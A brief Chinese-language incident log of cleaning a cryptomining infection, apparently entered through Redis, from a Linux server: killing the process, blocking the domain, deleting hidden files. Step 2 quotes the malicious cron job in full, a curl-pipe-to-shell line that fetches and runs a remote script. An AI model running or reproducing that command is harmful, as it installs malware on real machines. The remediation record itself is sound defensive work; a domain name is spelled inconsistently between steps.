1)linux服务器cpu异常升高,甚至飙升到了100%,但是top找不到所占用cpu的进程,怀疑因为redis的漏洞被植入了挖矿病毒
2)发现有异常的定时任务:
*/5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh
3)通过busybox top 查找相关进程,将该进程kill掉后cpu恢复正常,但过一会又升高
4)进入该进程目录查找文件:
5)进入查找到的文件路径:
6)打开后发现和定时任务中的一样:
7)ping pw.pwndbs.pw 查到ip,将该ip禁掉,或者写入/etc/hosts文件中,再重定向到本地127.0.0.1
8)删掉文件.update和.systemd文件,在kill -9 1201
9)cpu使用率回复正常,并且暂时不再升高,等待后续观察。